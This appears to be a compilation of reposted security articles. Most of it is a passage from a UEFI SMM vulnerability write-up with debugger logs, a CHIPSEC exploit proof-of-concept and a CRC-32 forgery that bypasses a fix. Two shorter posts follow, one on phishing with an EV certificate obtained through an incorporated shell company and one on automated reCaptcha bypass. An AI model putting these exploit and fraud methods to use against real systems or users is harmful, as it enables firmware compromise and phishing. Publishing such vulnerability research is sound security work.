[SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040
>>?

Now, with the processor in SMM, it is possible to access the protected memory.

>>> itp.threads[0].memsave('smram.bin', '0xbd000000P', '0xbd7fffffP', True)
Due to the requested amount of memory (8388608 bytes), this command will take a while to execute.
Due to the requested amount of memory (8388608 bytes), this command will take a while to execute.
>>>

So, getting the full dump recorded to a ".bin" file is only a matter of seconds. We can use the smram_parse.py script to analyze the dump. The point of interest here is Software SMI handlers, the most widely used UEFI BIOS attack vector. The script helps to get all the necessary information related to the SW SMI handlers:

SW SMI HANDLERS:
0xbd465c10: SMI = 0x28, addr = 0xbd463a3c, image = PowerMgmtSmm
0xbd59dc10: SMI = 0x56, addr = 0xbd59bb14, image = CpuSpSMI
0xbd59db10: SMI = 0x57, addr = 0xbd59bc88, image = CpuSpSMI
0xbd541d10: SMI = 0x62, addr = 0xbd574004, image = GenericComponentSmmEntry *
0xbd541b10: SMI = 0x65, addr = 0xbd575024, image = GenericComponentSmmEntry *
0xbd541a10: SMI = 0x63, addr = 0xbd5753a0, image = GenericComponentSmmEntry *
0xbd541910: SMI = 0x64, addr = 0xbd575a18, image = GenericComponentSmmEntry *
0xbd541810: SMI = 0xb2, addr = 0xbd575fa4, image = GenericComponentSmmEntry *
0xbd541110: SMI = 0xb0, addr = 0xbd537c28, image = NbSmi *
0xbd542910: SMI = 0xbb, addr = 0xbd52ed04, image = SbRunSmm
0xbd542210: SMI = 0xa0, addr = 0xbd525ce4, image = AcpiModeEnable
0xbd542010: SMI = 0xa1, addr = 0xbd525dd0, image = AcpiModeEnable
0xbd524b10: SMI = 0x55, addr = 0xbd5114d0, image = SmramSaveInfoHandlerSmm
0xbd4e6a10: SMI = 0x43, addr = 0xbd4e5360, image = AhciInt13Smm *
0xbd4e6810: SMI = 0x44, addr = 0xbd4e07bc, image = MicrocodeUpdate *
0xbd4e6610: SMI = 0x41, addr = 0xbd4dc9b8, image = OA3_SMM *
0xbd4e6510: SMI = 0xdf, addr = 0xbd4dab54, image = OA3_SMM
0xbd4e6410: SMI = 0xef, addr = 0xbd4d89e0, image = SmiVariable
0xbd4e6310: SMI = 0x90, addr = 0xbd4d42dc, image = BiosDataRecordSmi *
0xbd4cec10: SMI = 0x61, addr = 0xbd4cfde0, image = CmosSmm
0xbd4ce510: SMI = 0x42, addr = 0xbd4c4cd0, image = NvmeSmm
0xbd4ce110: SMI = 0x26, addr = 0xbd4ac32c, image = Ofbd *
0xbd497c10: SMI = 0x20, addr = 0xbd4929bc, image = SmiFlash *
0xbd497b10: SMI = 0x21, addr = 0xbd4929bc, image = SmiFlash *
0xbd497a10: SMI = 0x22, addr = 0xbd4929bc, image = SmiFlash *
0xbd497910: SMI = 0x23, addr = 0xbd4929bc, image = SmiFlash *
0xbd497810: SMI = 0x24, addr = 0xbd4929bc, image = SmiFlash *
0xbd497710: SMI = 0x25, addr = 0xbd4929bc, image = SmiFlash *
0xbd497410: SMI = 0x35, addr = 0xbd48fe24, image = TcgSmm
0xbd472f10: SMI = 0x31, addr = 0xbd474ca8, image = UsbRtSmm
0xbd472b10: SMI = 0xbf, addr = 0xbd46ea48, image = CrbSmi
0xbd472710: SMI = 0x01, addr = 0xbd46d5e0, image = PiSmmCommunicationSmm
0xbd472010: SMI = 0x50, addr = 0xbd4671d4, image = SmbiosDmiEdit
0xbd465f10: SMI = 0x51, addr = 0xbd4671d4, image = SmbiosDmiEdit
0xbd465e10: SMI = 0x52, addr = 0xbd4671d4, image = SmbiosDmiEdit
0xbd465d10: SMI = 0x53, addr = 0xbd4671d4, image = SmbiosDmiEdit

The data the script provides can also be used to find the memory addresses of the loaded SMM drivers. With this information, we can reverse-engineer the firmware modules mentioned above.

Detecting a Software SMI handler vulnerability

According to the report compiled by smram_parse.py, the UsbRtSmm module contains the implementation of SW SMI handler #0x31. In such a situation, the UEFITool utility can be used to extract the body of UsbRtSmm (see Fig. 7).

Fig. 7. Extracting the UsbRtSmm body

In the case of IDA Pro, much time can be saved by using the ida-efitools script, which helps to reverse engineer UEFI firmware. The script attempts to automatically define all the used UEFI structures and mark them in the idb. The UsbRtSmm module is located at 0xBD473000, and the SW SMI handler (aka DispatchFunction) at 0xbd474ca8.
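As a side note, since smram_parse.py reports both the module base and the handler address, the handler's offset inside the extracted PE image follows from a simple subtraction (useful for rebasing the IDA database so its addresses match the debugger's):

```python
# Both addresses come from the smram_parse.py output above.
MODULE_BASE = 0xBD473000    # runtime base of UsbRtSmm
HANDLER_ADDR = 0xBD474CA8   # SW SMI #0x31 handler (DispatchFunction)

# Offset of the handler inside the extracted module image; rebasing the
# IDA database to MODULE_BASE makes both views line up.
handler_offset = HANDLER_ADDR - MODULE_BASE
print(hex(handler_offset))  # -> 0x1ca8
```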
Analysis of DispatchFunction provides the following information: __int64 DispatchFunction() { __int64 v0; // rbx@1 unsigned __int8 *v1; // rdi@1 unsigned __int8 v2; // al@7 v0 = qword_BD48B460; v1 = *(unsigned __int8 **)(qword_BD48B460 + 30392); if ( v1 ) { *(_QWORD *)(qword_BD48B460 + 30392) = 0i64; } else { if ( *(_BYTE *)(qword_BD48B460 + 8) & 0x10 ) return 0i64; v1 = (unsigned __int8 *)*(_DWORD *)(16 * (unsigned int)v40E + 260); if ( sub_BD48AE24((__int64)v1) < 0 ) return 0i64; *(_BYTE *)(v0 + 31477) = 1; } if ( !v1 ) return 0i64; v2 = *v1; if ( !*v1 ) goto LABEL_11; if ( v2 >= 0x20u && v2 <= 0x38u ) { v2 -= 31; LABEL_11: ((void (__fastcall *)(unsigned __int8 *))off_BD473E30[(unsigned __int64)v2])(v1); v0 = qword_BD48B460; } if ( !*(_QWORD *)(v0 + 30392) ) *(_BYTE *)(v0 + 31477) = 0; return 0i64; } As it is evident, DispatchFunction operates with the qword_BD48B460 pointer, the value of which is unknown during static analysis. In addition, there is some structure participating in the logic. The pointer to the structure can be found by computing [16 * [0x40e] + 260]. The 0x40e memory address (stores segment address of Extended BIOS Data Area) may be easily controlled by a user with kernel level privileges. All in all, the structure can be described as user controlled input. The sub_BD48AE24 function checks whether the acquired pointer intercepts the SMRAM region, and exits from the handler if the pointer does. It can also be seen that the first byte of the obtained structure is a number of a called subfunction. The total amount of these subfunctions is equal to 24. 
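The selection logic above can be condensed into a few lines of Python (an illustrative model, not the driver's code):

```python
# Model of DispatchFunction's handler selection: the first byte of the
# user-supplied structure picks a subfunction from the off_BD473E30 table
# (the analysis above counts 24 of them). Values 0x20..0x38 are shifted
# down by 31 (0x1F) before the indexed call.
def dispatch_index(first_byte):
    if first_byte == 0:
        return 0
    if 0x20 <= first_byte <= 0x38:
        return first_byte - 31
    return None  # out of range: no handler is invoked

# A first byte of 0x2D therefore selects subfunction 14
print(dispatch_index(0x2D))  # -> 14
```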
The most interesting one among them is subfunction 14, located at 0xBD4760AC (for ease of analysis we named it subfunc_14):

int __fastcall subfunc_14(__int64 a1)
{
  __int64 v2; // rax@1
  LODWORD(v2) = sub_BD475F9C(
    *(200 * ((*(a1 + 11) - 16) >> 4) + qword_BD48B460 + 112 + 8i64 * *(a1 + 1) + 8),
    *(a1 + 3),
    (*(a1 + 15) + 3) & 0xFFFFFFFC);
  *(a1 + 2) = 0;
  *(a1 + 19) = v2;
  return v2;
}

qword_BD48B460 appears here as well, and it is used to acquire another pointer relative to it. After that, the acquired pointer is passed to the sub_BD475F9C function.

int __fastcall sub_BD475F9C(int (__fastcall *a1)(_QWORD, _QWORD, _QWORD), _QWORD *a2, unsigned int a3)
{
  ...
  v3 = a3 >> 3;
  if ( v3 )
  {
    v4 = v3 - 1;
    if ( v4 )
    {
      v5 = v4 - 1;
      if ( v5 )
      {
        ...
      }
      else
      {
        result = (a1)(*a2, a2[1]);
      }
    }
    else
    {
      result = (a1)(*a2);
    }
  }
  else
  {
    result = (a1)();
  }
  return result;

Here is "a little something" from the driver developer: the function calls another one, referenced by the pointer, and can pass it up to 7 arguments! But is it possible to control the pointer? In subfunc_14, the pointer is computed relative to qword_BD48B460. Dynamic analysis makes it easy to learn its actual value:

>>? itp.halt()
[SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040
[SKL_C0_T1] Halt Command break at 0x33:00007FFA8EBB5F84 in task 0x0040
[SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040
[SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF80DCAA31348 in task 0x0040
>>> itp.cv.smmentrybreak=1
>>> itp.threads[0].port(0xb2, 0x31) # call SW SMI #0x31
>>> itp.go()
>>? [SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040
[SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040
[SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040
[SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040
>>?
>>> itp.threads[0].br(None, '0xbd474ca8L', 'exe') # set breakpoint on execution at DispatchFunction
>>> itp.threads[0].go()
>>? [SKL_C0_T0] Debug register break on instruction execution only at 0x38:00000000BD474CA8 in task 0x0040
[SKL_C0_T1] BreakAll break at 0x38:00000000BD7DC838 in task 0x0040
[SKL_C1_T0] BreakAll break at 0x38:00000000BD7DC834 in task 0x0040
[SKL_C1_T1] BreakAll break at 0x38:00000000BD7DC834 in task 0x0040
>>?
>>> itp.threads[0].asm('$', 5) # show disassembly listing
0x38:00000000BD474CA8 48895c2408 mov qword ptr [rsp + 0x08], rbx
0x38:00000000BD474CAD 57 push rdi
0x38:00000000BD474CAE 4883ec20 sub rsp, 0x20
0x38:00000000BD474CB2 488b1d574883ec mov rbx, qword ptr [rip - 0x137cb7a9]
0x38:00000000BD474CB9 488bbbb8760000 mov rdi, qword ptr [rbx + 0x000076b8]
>>> itp.threads[0].step(None, 4) # step 4 times
[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CAD in task 0x0040
[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CAE in task 0x0040
[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CB2 in task 0x0040
[SKL_C0_T0] Single STEP break at 0x38:00000000BD474CB9 in task 0x0040
>>> itp.threads[0].display('rbx') # rbx contains the value of qword_BD48B460
rbx = 0x00000000bcee9000
rbx.ebx = 0xbcee9000
rbx.ebx.bx = 0x9000
rbx.ebx.bx.bl = 0x00
rbx.ebx.bx.bh = 0x90

So, the driver operates with a pointer equal to 0xbcee9000. But is that SMM memory? SMRAM covers the range from 0xbd000000 to 0xbd7fffff; in other words, the memory at 0xbcee9000 is not protected. Considering that the driver allows calling a pointer stored in unprotected memory, there is an opportunity to achieve arbitrary code execution in the SMM context. For the sake of completeness, it remains to determine how to compute the 0xbcee9000 address from an OS.
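The range test performed by the handler (sub_BD48AE24), and the reason the 0xbcee9000 pointer slips through it, can be sketched like this, with the SMRAM bounds taken from the CHIPSEC output earlier:

```python
# Sketch of the only protection the handler applies: reject pointers that
# intersect SMRAM. Bounds come from cs.cpu.get_SMRAM() above.
SMRAM_BASE = 0xBD000000
SMRAM_LIMIT = 0xBD7FFFFF

def overlaps_smram(addr, size):
    # True if [addr, addr + size) intersects the protected SMRAM range
    return addr <= SMRAM_LIMIT and addr + size - 1 >= SMRAM_BASE

# The structure sits just below SMRAM, so the check passes and the handler
# happily dereferences attacker-reachable memory
print(overlaps_smram(0xBCEE9000, 8))       # -> False
print(overlaps_smram(0xBD000000, 0x1000))  # -> True
```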
By analyzing xrefs to qword_BD48B460, it is possible to find the exact place where these values are assigned:

if ( (gEfiBootServices_4->LocateProtocol(&EFI_USB_PROTOCOL_GUID, 0i64, &EfiUsbProtocol) & 0x8000000000000000ui64) == 0i64 )
{
  qword_BD48B460 = *(EfiUsbProtocol + 8);
  *(EfiUsbProtocol + 0x50) = sub_BD4759E8;
  *(EfiUsbProtocol + 0x58) = sub_BD475CCC;
  *(EfiUsbProtocol + 0x60) = sub_BD475D74;

The pointer in question (let us call it usb_data) is stored in the EFI_USB_PROTOCOL protocol. Therefore, we need to understand which module registers it. With the help of GUID {2ad8e2d2-2e91-4cd1-95f5-e78fe5ebe316} in UEFITool, we can find the Uhcd module with the following code segment:

LODWORD(usb_protocol) = sub_6088(0x90i64, 0x10i64);
*(_QWORD *)(usb_protocol + 8) = usb_data;
qword_CB58 = usb_protocol;
*(_QWORD *)(usb_protocol + 16) = sub_30B4;
*(_DWORD *)usb_protocol = 'PBSU';
*(_QWORD *)(usb_protocol + 24) = sub_2E40;
*(_QWORD *)(usb_protocol + 32) = sub_2FC8;
*(_QWORD *)(usb_protocol + 40) = sub_350C;
*(_QWORD *)(usb_protocol + 48) = sub_3524;
*(_QWORD *)(usb_protocol + 56) = sub_3524;
*(_QWORD *)(usb_protocol + 64) = sub_3524;
*(_QWORD *)(usb_protocol + 72) = sub_6448;
*(_QWORD *)(usb_protocol + 104) = sub_31F8;
*(_QWORD *)(usb_protocol + 112) = sub_63AC;
*(_QWORD *)(usb_protocol + 120) = sub_3238;
gEfiBootServices_0->InstallProtocolInterface(&v25, &EFI_USB_PROTOCOL_GUID, 0, (void *)usb_protocol);

The EFI_USB_PROTOCOL structure has the USBP signature at offset zero. The sub_6088 function helps to identify the exact location of the structure.

gEfiBootServices_0->AllocatePages(AllocateMaxAddress, EfiRuntimeServicesData, 0x11ui64, &Memory)

Another "little something" from the developer: the memory for the structure is allocated as EfiRuntimeServicesData, which means the structure is outside the SMRAM region. More precisely, it is located below SMRAM, as borne out by the allocation type being AllocateMaxAddress.
It is also worth mentioning that the EFI_USB_PROTOCOL structure address will be aligned to PAGE_SIZE (0x1000). With all the required vulnerability-related information gathered, using CHIPSEC it is possible to write a simple proof-of-concept that hangs the system with a Machine Check Exception.

from struct import pack, unpack
import chipsec.chipset
from chipsec.hal.interrupts import Interrupts

PAGE_SIZE = 0x1000
SMI_USB_RUNTIME = 0x31

cs = chipsec.chipset.cs()
cs.init(None, True, True)
intr = Interrupts(cs)
SMRAM = cs.cpu.get_SMRAM()[0]
mem_read = cs.helper.read_physical_mem
mem_write = cs.helper.write_physical_mem
mem_alloc = cs.helper.alloc_physical_mem

# locate EFI_USB_PROTOCOL and usb_data in the memory
for addr in xrange(SMRAM / PAGE_SIZE - 1, 0, -1):
    if mem_read(addr * PAGE_SIZE, 4) == 'USBP':
        usb_protocol = addr * PAGE_SIZE
        usb_data = unpack('<Q', mem_read(addr * PAGE_SIZE + 8, 8))[0]
        break

assert usb_protocol != 0, "can't find EFI_USB_PROTOCOL structure"
assert usb_data != 0, "usb_data pointer is empty"

# prepare our structure
struct_addr = mem_alloc(PAGE_SIZE, 0xffffffff)[1]
mem_write(struct_addr, PAGE_SIZE, '\x00' * PAGE_SIZE)  # clean the structure
mem_write(struct_addr + 0x0, 1, '\x2d')  # subfunction number
mem_write(struct_addr + 0xb, 1, '\x10')  # arithmetic adjustment

# store the pointer to the structure in the EBDA
ebda_addr = unpack('<H', mem_read(0x40e, 2))[0] * 0x10
mem_write(ebda_addr + 0x104, 4, pack('<I', struct_addr))

# replace the pointer in the usb_data
bad_ptr = 0xbaddad
func_offset = 0x78
mem_write(usb_data + func_offset, 8, pack('<Q', bad_ptr))

# allow to read the pointer from EBDA
x = ord(mem_read(usb_data + 0x8, 1)) & ~0x10
mem_write(usb_data + 0x8, 1, chr(x))

# stuck it!
intr.send_SW_SMI(0, SMI_USB_RUNTIME, 0, 0, 0, 0, 0, 0, 0)

As can be seen below, the handler has indeed called the bogus address and hung the system.

>>> itp.cv.smmentrybreak=1
>>> itp.go()
>>? # running PoC on the target system...
>>?
[SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040
[SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040
[SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040
[SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040
>>?
>>> itp.cv.machinecheckbreak=1
>>> itp.go()
>>? [SKL_C0_T0] Machine Check break at 0x38:0000000000BADDAD in task 0x0040
[SKL_C0_T1] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040
[SKL_C1_T0] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040
[SKL_C1_T1] Machine Check break at 0x38:00000000BD7DC834 in task 0x0040
>>?

A Machine Check Exception occurred when the first thread jumped to 0xBADDAD - the address specified in the proof-of-concept.

Impact and Consequences

Although a vulnerability in a particular motherboard poses a certain threat, it is not as critical as a vulnerability common to motherboards produced by different vendors. So, it is necessary to determine whether other vendors use the same module in their hardware products. There is no need to examine other firmware to do this: the data from the efi-whitelist repository will suffice. A simple list search shows that the vulnerable module is used by all the vendors. Moreover, according to the data we have gathered, GIGABYTE, ASUS, and Dell are vulnerable as well. Intel firmware is of most relevance here, because Intel cares about the security of its devices more than others do. We made a special showcase stand and researched an Intel NUC Kit NUC7i3BNH based on Kaby Lake to see if Intel's firmware contains this vulnerability (see Fig. 8).

Fig. 8. Showcase stand

Exploiting the Intel NUC Kit

At the time of writing, the latest firmware version is 0048. Having extracted the UsbRtSmm module, we can analyze DispatchFunction.
Comparing the module with the same one in GA-Q170M-D3H, it can be concluded that the exploitation paths are almost identical, with one exception: there is the following code right at the beginning of DispatchFunction:

if ( byte_1B158 == 1 )
    return 0i64;
if ( sub_1A80C(usb_data) < 0 )
{
    byte_1B159 = 1;
    byte_1B158 = 1;
    return 0i64;
}

It looks like a fix of a kind, but let us not get carried away. First of all, we need to figure out in which cases byte_1B158 takes the value 1. Excluding the cases when byte_1B158 is set to 1 after sub_1A80C returns a negative result, it becomes obvious that sub_5EEC does it unconditionally. There is a single xref to sub_5EEC, pointing to the following function:

int __fastcall sub_5F1C(EFI_GUID *Protocol, void *Interface, EFI_HANDLE Handle)
{
  signed __int64 v3; // rax@1
  char v5; // [sp+20h] [bp-18h]@2
  void *acpi_en_dispatch; // [sp+58h] [bp+20h]@1
  v3 = Smst->SmmLocateProtocol(&EFI_ACPI_EN_DISPATCH_PROTOCOL_GUID, 0i64, &acpi_en_dispatch);
  if ( v3 >= 0 )
    LODWORD(v3) = (*acpi_en_dispatch)(acpi_en_dispatch, sub_5EEC, &v5);
  return v3;

The function is passed as an argument when a method of the unknown EFI_ACPI_EN_DISPATCH_PROTOCOL is called; it seems to be a callback. In other words, the sub_5EEC function will be called when a certain event occurs. But what is this event? Searching for GUID {bd88ec68-ebe4-4f7b-935a-4f666642e75f} shows that the protocol is implemented in the AcpiModeEnable module. The name is quite self-explanatory, isn't it? There is no need to research it further: it is obvious that sub_5EEC is called when the system switches to ACPI mode. Unfortunately, this makes the vulnerability more difficult to exploit on Windows 10 systems, because, starting from Vista, Windows drivers work only in ACPI mode. Linux, we beg you, come and save us! With Ubuntu 16.10 AMD64 installed, we can load the system in non-ACPI mode. To do this, we add acpi=off to the GRUB_CMDLINE_LINUX_DEFAULT parameter.
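A minimal sketch of that edit (run here against a sample copy of the line; on the real system the file is /etc/default/grub and the GRUB config must be regenerated afterwards):

```shell
# Create a sample of the relevant line, then append acpi=off to it.
printf 'GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"\n' > grub.sample
sed -i 's/^\(GRUB_CMDLINE_LINUX_DEFAULT="[^"]*\)"/\1 acpi=off"/' grub.sample
cat grub.sample
# GRUB_CMDLINE_LINUX_DEFAULT="quiet splash acpi=off"
# On the real system: sudo update-grub   (regenerates /boot/grub/grub.cfg)
```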
After that, the system will load without ACPI support. The only thing left to do is to learn what the sub_1A80C function checks. Researching the function made it clear that it validates the usb_data structure. The checking algorithm is quite large, but the only check we are interested in is the one covering the usb_data + 0x78 address, which can be seen in the sub_1A2D0 function containing the code segment below:

if ( &buffer != (usb_data + 0x70) )
    memcpy(&buffer, (usb_data + 0x70), 0x320ui64);
if ( &v19 != (usb_data + 0x6B0) )
    memcpy(&v19, (usb_data + 0x6B0), 0x150ui64);
if ( &v20 != (usb_data + 0x950) )
    memcpy(&v20, (usb_data + 0x950), 0x150ui64);
if ( &v21 != (usb_data + 0x7188) )
    memcpy(&v21, (usb_data + 0x7188), 0x190ui64);

The pointer we need is copied to an internal buffer here. After that, we can see the following code at the end of the function:

calculate_crc32(&buffer, 0x7A0ui64, &crc_array[2]);
calculate_crc32(crc_array, 0xCui64, crc_out);

So this is the fix for the vulnerability exploited in GA-Q170M-D3H. While the system is loading, the CRC-32 hash of a part of the usb_data structure memory region is calculated and saved. When the SW SMI is called, the hash is recalculated. If the result does not match, execution stops, and further attempts to execute handler code are prohibited. Perhaps the fix does prevent naive exploitation, but there is one little "but" about it: the validation algorithm depends entirely on the cryptographic strength of the CRC-32 algorithm, which is... close to zero. To spoof a CRC-32 hash, we can simply correct 4 consecutive bytes after changing the data we are interested in, using the Python script from Project Nayuki. The only thing needed is to adapt its functions to operate on a buffer instead of files.
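Why do 4 bytes always suffice? CRC-32 is an affine function over GF(2): for equal-length inputs, XOR-ing the messages XORs the checksums (up to a length-dependent constant), so a 32-bit patch window can reach any target checksum by solving a small linear system, which is exactly what the Project Nayuki script does. The property is easy to verify with the standard zlib implementation:

```python
import zlib

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

x = b'\x01\x02\x03\x04\x05\x06\x07\x08'
y = b'\x10\x20\x30\x40\x50\x60\x70\x80'
zero = b'\x00' * 8  # all-zero buffer of the same length

# crc(x ^ y) == crc(x) ^ crc(y) ^ crc(0...0): the affine relation that
# makes CRC-32 forgeable with a fixed-size patch
assert zlib.crc32(xor(x, y)) == zlib.crc32(x) ^ zlib.crc32(y) ^ zlib.crc32(zero)
print('CRC-32 is affine, not cryptographic')
```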
Considering the CRC-32 hash check, we can modify the pointer like this:

bad_ptr = 0xbaddad
buf_size = 0x10
buffer = mem_read(usb_data + 0x70, buf_size)
crc32 = get_buffer_crc32(buffer)

# replace the pointer (usb_data + 0x78)
buffer = buffer[0:8] + pack('<Q', bad_ptr)

# spoofing crc32, first 4 bytes will be modified
buffer = modify_buffer_crc32(buffer, 0, crc32)
mem_write(usb_data + 0x70, buf_size, buffer)

However, as opposed to GA-Q170M-D3H, on the Intel NUC7i3BNH an error occurs:

AssertionError: usb_data pointer is empty

If we return to the Uhcd module (this time the one from the NUC7i3BNH firmware), we can see that one of its functions acts like this:

EFI_STATUS __fastcall sub_2CB0(void *a1)
{
  *(_QWORD *)(usb_protocol + 8) = 0i64;
  return gEfiBootServices_0->CloseEvent(a1);
}

It looks like a mitigation of a kind. Now the usb_data structure address has to be determined another way. Going back to the place where the usb_data and usb_protocol structures are allocated, it is plain that in both cases the sub_64D4 function is called. The function takes the memory allocation size and address alignment as arguments. Reviewing the function, we found out that memory allocation occurs once via EFI_BOOT_SERVICES.AllocatePages, when the function is called for the first time, and a total of 0x11 pages of memory is allocated at once. Further calls carve this allocation into pieces, according to the alignment. Such behavior makes it possible to locate the usb_data structure address on the basis of the usb_protocol address. The first allocation to be made is for usb_data (0x7AC8 bytes). After that, an unknown memory region of 0x8000 bytes that requires an alignment of 0x1000 bytes is allocated. Finally, usb_protocol gets its memory (0x90 bytes with an alignment of 0x10). Thus, it is possible to subtract 0x10000 from the usb_protocol address to learn the usb_data structure address.
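The subtraction can be double-checked with the allocation arithmetic recovered from Uhcd (sizes and alignments as listed above):

```python
# Replay the carve-out sequence of the 0x11-page pool to confirm the fixed
# distance between usb_data and usb_protocol.
def align_up(x, a):
    return (x + a - 1) & ~(a - 1)

pool = 0x0                              # start of the 0x11-page allocation
usb_data = pool                         # 1st carve-out: usb_data, 0x7AC8 bytes
cursor = usb_data + 0x7AC8
unknown = align_up(cursor, 0x1000)      # 2nd: 0x8000 bytes, 0x1000-aligned
cursor = unknown + 0x8000
usb_protocol = align_up(cursor, 0x10)   # 3rd: usb_protocol, 0x90 bytes, 0x10-aligned

assert usb_protocol - usb_data == 0x10000
```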
Here is the finishing stroke of our proof-of-concept.

assert usb_protocol != 0, "can't find EFI_USB_PROTOCOL structure"
if usb_data == 0:
    usb_data = usb_protocol - 0x10000

See the full proof-of-concept at: UsbRt SMM Privilege Elevation

Conclusion

We have managed to detect a highly critical vulnerability that allows privilege escalation up to System Management Mode. The vulnerability is common to a broad range of platforms because it resides in the UsbRtSmm module. Despite certain exceptions, even the newest Intel devices are susceptible to this threat. Moreover, we described the process of bypassing the "robust protection" granted by the CRC-32 hash, a pseudo-mitigation. Before we call it a day, here is a lifehack for those hunting 1-days: since Intel releases firmware updates that specify security fixes in their changelogs, you can perform binary diffing of firmware modules against those in other vendors' firmware.

Timeline of Disclosure

07/10/2017 - Vulnerability reported to Intel. They had changed their PGP key that very day, so we got no answer.
08/21/2017 - Vulnerability reported to Intel, again
08/22/2017 - Intel acknowledges receiving the report
08/23/2017 - Intel says this issue has been fixed
08/28/2017 - Embedi confirms the issue is resolved
10/10/2017 - Intel pulled down its security advisory
10/21/2017 - Embedi presents "UEFI BIOS holes: So Much Magic, Don't Come Inside" at H2HC in Brazil
10/24/2017 - Blog article posted

Sursa: https://embedi.com/blog/uefi-bios-holes-so-much-magic-dont-come-inside
First part of phishing with EV

13 SEPTEMBER 2017

This post is intended for a technical audience interested in how an EV SSL certificate can be used as an effective phishing device. I won't be held liable if someone uses this post for unlawful purposes. No one was harmed in this demonstration. Let's get on.

Extended validation, or EV, was designed back in the day to be an effective way to prevent phishing, but, as we've seen through the years, extended validation has a lot of shortcomings, such as long vetting processes, lack of wildcard support, and many other things. Now I'm going to demonstrate that it is indeed possible to phish with an EV SSL and how easy and straightforward it is to obtain the certificate. View Ryan Hurst's blog post here about the overall positive trust indicators in browsers.

First, I needed to think of a name which would be effective for phishing. After some deliberation, I chose the name "Identity Verified", as it would give the user the illusion that the phishing site is safe.

Second, I had to think of a way of getting an EV SSL certificate for the intended name. After some research on the CA/Browser Forum site, I found that, in the EV SSL certificate guidelines, section 8.5.2 stipulates that incorporated private entities are allowed to obtain EV SSL certificates. With that information in mind, I decided to incorporate a company here in the UK, and after some more research I found that a limited company by guarantee with the limited exemption was the right one. But there was one catch: to incorporate a company in the UK, you need a verifiable address and a valid ID. So what does an attacker do? Well, they can purchase a stolen ID for a few pounds from the so-called "Dark web" and just use a service address as the address of the company and the director's home. These service addresses can be bought online for next to nothing.

Note: This company was made with a legitimate address and ID.
Now, finally, I began searching for a company to incorporate this new company on my behalf, and after a good hour of researching on Google, I found the right one. I won't say the company name here for legal purposes, but I will say that the process was incredibly easy: no ID check to my knowledge, and it cost less than £40. The company was incorporated by Companies House the next day.

After all this was finished, I had to include a telephone number in a third-party database, as stipulated in section 11.5.2 of the EV SSL certificate guidelines. I chose Dun and Bradstreet as the third-party database, as it's extensively used by CAs for third-party checking. It was absolutely easy to add the extra information to the Dun and Bradstreet database: I only needed to get my Dun and Bradstreet ID and fill in a form with my mobile number as the telephone, and after a few days it was included. I was now ready to get an EV SSL certificate.

I chose Comodo and Symantec for this demonstration, as they were, at the time of this post, the largest CAs in the industry. First, I went to the Symantec site and found the 30-day free trial of a production-use EV SSL certificate. After filling in all the details required by Symantec, including a 256-bit ECC CSR, I was finished for now, until the validation process was completed. After a few days and a bit of pushing, the certificate was issued. https://crt.sh/?id=181513189

After the successful issuance from Symantec, I then tried doing the same with Comodo, and it failed at the first hurdle. Richard Smith, who is the head of validation at Comodo, felt that the certificate couldn't be issued due to compliance issues. Great job, Richard!

Now the certificate part is finished, and I can get on with the phishing part of this test and demonstrate how someone could phish with an EV SSL. First I took a copy of both the Google and PayPal sites and then uploaded them onto nothing.org.uk.
Now, in a real-world phishing scenario, an attacker would also need to set up a database etc. to capture the data, but I didn't need to, because this wasn't an actual phishing attempt to capture real users' data.

In the screenshots below, from Safari on OSX and iOS, the chances of a successful phish are extremely high because of the way Safari hides the actual domain when the site is using an EV SSL; in combination with the company name "Identity Verified", the site looks legitimate and safe.

In this screenshot of Google Chrome, the domain name and the company name are clearly separated, which can help the user identify whether it's a phishing site or not. But if someone could get hold of a short single-letter domain like p.uk for PayPal or g.uk for Google, the user might think that the company in question has moved over to a smaller domain name and not be concerned.

The EV SSL certificate in Firefox.

To conclude this post, I think Symantec shouldn't have issued this EV SSL certificate in the first place, as the company name was too generic and could easily be misconstrued in the browser. If you've got any questions about this post, please contact me here. The final part will be published in the next few days and will go into more detail about the larger problems of phishing.

To Symantec: You have my full permission to release all details concerning this certificate issue to the public domain.

James Burton

Sursa: https://0.me.uk/ev-phishing/
-
uncaptcha Defeating Google's audio reCaptcha system with 85% accuracy. Inspiration Across the Internet, hundreds of thousands of sites rely on Google's reCaptcha system for defense against bots (in fact, Devpost uses reCaptcha when creating a new account). After a Google research team demonstrated a near complete defeat of the text reCaptcha in 2012, the reCaptcha system evolved to rely on audio and image challenges, historically more difficult challenges for automated systems to solve. Google has continually iterated on its design, releasing a newer and more powerful version as recently as just this year. Successfully demonstrating a defeat of this captcha system spells significant vulnerability for hundreds of thousands of popular sites. What it does Our unCaptcha system has attack capabilities written for the audio captcha. Using browser automation software, we can interact with the target website and engage with the captcha, parsing out the necessary elements to begin the attack. We rely primarily on the audio captcha attack - by properly identifying spoken numbers, we can pass the reCaptcha programmatically and fool the site into thinking our bot is a human. Specifically, unCaptcha targets the popular site Reddit by going through the motions of creating a new user, although unCaptcha stops before creating the user to mitigate the impact on Reddit. Sursa: https://github.com/ecthros/uncaptcha
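The project's core trick is transcribing the spoken digits and then normalizing the result. The transcription step needs a speech-to-text engine, but the normalization step can be sketched on its own. This is my own illustration of the idea, not uncaptcha's actual code, and the homophone table is an assumption:

```python
# Sketch of the digit-normalization step an audio-captcha solver needs:
# speech-to-text engines often return homophones ("won", "for") or words
# ("one") instead of the digits the captcha expects.
HOMOPHONES = {
    "zero": "0", "oh": "0", "one": "1", "won": "1", "two": "2", "to": "2",
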